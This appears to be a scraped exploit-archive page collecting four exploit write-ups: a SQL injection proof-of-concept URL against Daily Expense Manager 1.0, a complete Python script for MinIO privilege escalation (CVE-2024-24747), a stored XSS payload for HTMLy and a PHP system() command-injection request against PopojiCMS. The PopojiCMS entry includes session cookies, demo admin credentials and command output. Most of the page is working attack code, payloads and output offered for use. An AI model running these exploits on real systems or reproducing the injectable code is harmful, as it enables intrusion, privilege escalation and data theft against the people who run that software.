# Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi # Date: February 25th, 2024 # Exploit Author: Stefan Hesselman # Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/ # Software Link: https://download-media.code-projects.org/2020/01/DAILY_EXPENSE_MANAGER_IN_PHP_WITH_SOURCE_CODE.zip # Version: 1.0 # Tested on: Kali Linux # CVE: N/A # CWE: CWE-89, CWE-74 ## Description Daily Expense Manager is vulnerable to SQL injection attacks. The affected HTTP parameter is the 'term' parameter. Any remote, unauthenticated attacker can exploit the vulnerability by injecting additional, malicious SQL queries to be run on the database. ## Vulnerable endpoint: http://example.com/Daily-Expense-Manager/readxp.php?term=asd ## Vulnerable HTTP parameter: term (GET) ## Exploit proof-of-concept: http://example.com/Daily-Expense-Manager/readxp.php?term=asd%27%20UNION%20ALL%20SELECT%201,@@version,3,4,5,6--%20- ## Vulnerable PHP code: File: /Daily-Expense-Manager/readxp.php, Lines: 16-23 <?php [...] //get search term $searchTerm = $_GET['term']; # unsanitized and under control of the attacker. //get matched data from skills table $query = $conn->query("SELECT * FROM expense WHERE pname like '%$searchTerm%' AND uid='$sid' and isdel='0' group by pname"); while ($row = $query->fetch_assoc()) { $data[] = $row['pname']; } //return json data echo json_encode($data); ?>
HireHackking

MinIO < 2024-01-31T20-20-33Z - Privilege Escalation

HACKER · %s · %s

# Exploit Title: MinIO < 2024-01-31T20-20-33Z - Privilege Escalation # Date: 2024-04-11 # Exploit Author: Jenson Zhao # Vendor Homepage: https://min.io/ # Software Link: https://github.com/minio/minio/ # Version: Up to (excluding) RELEASE.2024-01-31T20-20-33Z # Tested on: Windows 10 # CVE : CVE-2024-24747 # Required before execution: pip install minio,requests import argparse import datetime import traceback import urllib from xml.dom.minidom import parseString import requests import json import base64 from minio.credentials import Credentials from minio.signer import sign_v4_s3 class CVE_2024_24747: new_buckets = [] old_buckets = [] def __init__(self, host, port, console_port, accesskey, secretkey, verify=False): self.bucket_names = ['pocpublic', 'pocprivate'] self.new_accesskey = 'miniocvepoc' self.new_secretkey = 'MINIOcvePOC' self.headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36', 'Content-Type': 'application/json', 'Accept': '*/*' } self.accesskey = accesskey self.secretkey = secretkey self.verify = verify if verify: self.url = "https://" + host + ":" + port self.console_url = "https://" + host + ":" + console_port else: self.url = "http://" + host + ":" + port self.console_url = "http://" + host + ":" + console_port self.credits = Credentials( access_key=self.new_accesskey, secret_key=self.new_secretkey ) self.login() try: self.create_buckets() self.create_accesskey() self.old_buckets = self.console_ls() self.console_exp() self.new_buckets = self.console_ls() except: traceback.print_stack() finally: self.delete_accesskey() self.delete_buckets() if len(self.new_buckets) > len(self.old_buckets): print("There is CVE-2024-24747 problem with the minio!") print("Before the exploit, the buckets are : " + str(self.old_buckets)) print("After the exploit, the buckets are : " + str(self.new_buckets)) else: print("There is no CVE-2024-24747 problem with the minio!") def login(self): url = self.url + "/api/v1/login" payload = json.dumps({ "accessKey": self.accesskey, "secretKey": self.secretkey }) self.session = requests.session() if self.verify: self.session.verify = False status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code # print(status_code) if status_code == 204: status_code = 0 else: print('Login failed! Please check if the input accesskey and secretkey are correct!') exit(1) def create_buckets(self): url = self.url + "/api/v1/buckets" for name in self.bucket_names: payload = json.dumps({ "name": name, "versioning": False, "locking": False }) status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code # print(status_code) if status_code == 200: status_code = 0 else: print("新建 (New)"+name+" bucket 失败 (fail)!") def delete_buckets(self): for name in self.bucket_names: url = self.url + "/api/v1/buckets/" + name status_code = self.session.request("DELETE", url, headers=self.headers).status_code # print(status_code) if status_code == 204: status_code = 0 else: print("删除 (delete)"+name+" bucket 失败 (fail)!") def create_accesskey(self): url = self.url + "/api/v1/service-account-credentials" payload = json.dumps({ "policy": "{ \n \"Version\":\"2012-10-17\", \n \"Statement\":[ \n { \n \"Effect\":\"Allow\", \n \"Action\":[ \n \"s3:*\" \n ], \n \"Resource\":[ \n \"arn:aws:s3:::pocpublic\", \n \"arn:aws:s3:::pocpublic/*\" \n ] \n } \n ] \n}", "accessKey": self.new_accesskey, "secretKey": self.new_secretkey }) status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code # print(status_code) if status_code == 201: # print("新建 (New)" + self.new_accesskey + " accessKey 成功 (success)!") # print(self.new_secretkey) status_code = 0 else: print("新建 (New)" + self.new_accesskey + " accessKey 失败 (fail)!") def delete_accesskey(self): url = self.url + "/api/v1/service-accounts/" + base64.b64encode(self.new_accesskey.encode("utf-8")).decode('utf-8') status_code = self.session.request("DELETE", url, headers=self.headers).status_code # print(status_code) if status_code == 204: # print("删除" + self.new_accesskey + " accessKey成功!") status_code = 0 else: print("删除 (delete)" + self.new_accesskey + " accessKey 失败 (fail)!") def headers_gen(self,url,sha256,method): datetimes = datetime.datetime.utcnow() datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ') urls = urllib.parse.urlparse(url) headers = { 'X-Amz-Content-Sha256': sha256, 'X-Amz-Date': datetime_str, 'Host': urls.netloc, } headers = sign_v4_s3( method=method, url=urls, region='us-east-1', headers=headers, credentials=self.credits, content_sha256=sha256, date=datetimes, ) return headers def console_ls(self): url = self.console_url + "/" sha256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" headers = self.headers_gen(url,sha256,'GET') if self.verify: response = requests.get(url,headers=headers,verify=False) else: response = requests.get(url, headers=headers) DOMTree = parseString(response.text) collection = DOMTree.documentElement buckets = collection.getElementsByTagName("Bucket") bucket_names = [] for bucket in buckets: bucket_names.append(bucket.getElementsByTagName("Name")[0].childNodes[0].data) # print('当前可查看的bucket有:\n' + str(bucket_names)) return bucket_names def console_exp(self): url = self.console_url + "/minio/admin/v3/update-service-account?accessKey=" + self.new_accesskey sha256 = "0f87fd59dff29507f82e189d4f493206ea7f370d0ce97b9cc8c1b7a4e609ec95" headers = self.headers_gen(url, sha256, 'POST') hex_string = "e1fd1c29bed167d5cf4986d3f224db2994b4942291dbd443399f249b84c79d9f00b9e0c0c7eed623a8621dee64713a3c8c63e9966ab62fcd982336" content = bytes.fromhex(hex_string) if self.verify: response = requests.post(url,headers=headers,data=content,verify=False) else: response = requests.post(url,headers=headers,data=content) status_code = response.status_code if status_code == 204: # print("提升" + self.new_accesskey + " 权限成功!") status_code = 0 else: print("提升 (promote)" + self.new_accesskey + " 权限失败 (Permission failed)!") if __name__ == '__main__': logo = """ ____ ___ ____ _ _ ____ _ _ _____ _ _ _____ ___ __ __ ___ |___ \ / _ \ |___ \ | || | |___ \ | || | |___ || || | |___ | / __|\ \ / / / _ \ _____ __) || | | | __) || || |_ _____ __) || || |_ / / | || |_ / / | (__ \ V / | __/|_____| / __/ | |_| | / __/ |__ _||_____| / __/ |__ _| / / |__ _| / / \___| \_/ \___| |_____| \___/ |_____| |_| |_____| |_| /_/ |_| /_/ """ print(logo) parser = argparse.ArgumentParser() parser.add_argument("-H", "--host", required=True, help="Host of the target. example: 127.0.0.1") parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin") parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin") parser.add_argument("-c", "--console_port", required=True, help="Minio console port of the target. example: 9000") parser.add_argument("-p", "--port", required=True, help="Minio port of the target. example: 9090") parser.add_argument("--https", action='store_true', help="Is MinIO accessed through HTTPS.") args = parser.parse_args() CVE_2024_24747(args.host,args.port,args.console_port,args.accesskey,args.secretkey,args.https)
HireHackking

HTMLy Version v2.9.6 - Stored XSS

HACKER · %s · %s

# Exploit Title: HTMLy Version v2.9.6 - Stored XSS # Exploit Author: tmrswrr # Vendor Homepage: https://www.htmly.com/ # Version 3.10.8.21 # Date : 04/08/2024 1 ) Login admin https://127.0.0.1/HTMLy/admin/config 2 ) General Setting > Blog title > "><img src=x onerrora=confirm() onerror=confirm(1)> 3 ) After save it you will be see XSS alert
HireHackking

PopojiCMS Version 2.0.1 - Remote Command Execution

HACKER · %s · %s

# Exploit Title: PopojiCMS Version : 2.0.1 Remote Command Execution # Date: 27/11/2023 # Exploit Author: tmrswrr # Vendor Homepage: https://www.popojicms.org/ # Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip # Version: Version : 2.0.1 # Tested on: https://www.softaculous.com/apps/cms/PopojiCMS ##POC: 1 ) Login with admin cred and click settings 2 ) Click on config , write your payload in Meta Social > <?php echo system('id'); ?> 3 ) Open main page , you will be see id command result POST /PopojiCMS9zl3dxwbzt/po-admin/route.php?mod=setting&act=metasocial HTTP/1.1 Host: demos5.softaculous.com Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701095610.3.1.1701096569.0.0.0; _ga=GA1.1.386621536.1701082112; AEFCookies1526[aefsid]=3cbt9mdj1kpi06aj1q5r8yhtgouteb5s; PHPSESSID=b6f1f9beefcec94f09824efa9dae9847; lang=gb; demo_563=%7B%22sid%22%3A563%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%22%2C%22adminurl%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%5C%2Fpo-admin%5C%2F%22%2C%22dir_suffix%22%3A%229zl3dxwbzt%22%7D User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://demos5.softaculous.com/PopojiCMS9zl3dxwbzt/po-admin/admin.php?mod=setting Content-Type: application/x-www-form-urlencoded Content-Length: 58 Origin: https://demos5.softaculous.com Dnt: 1 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close meta_content=%3C%3Fphp+echo+system%28%27id%27%29%3B+%3F%3E Result: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)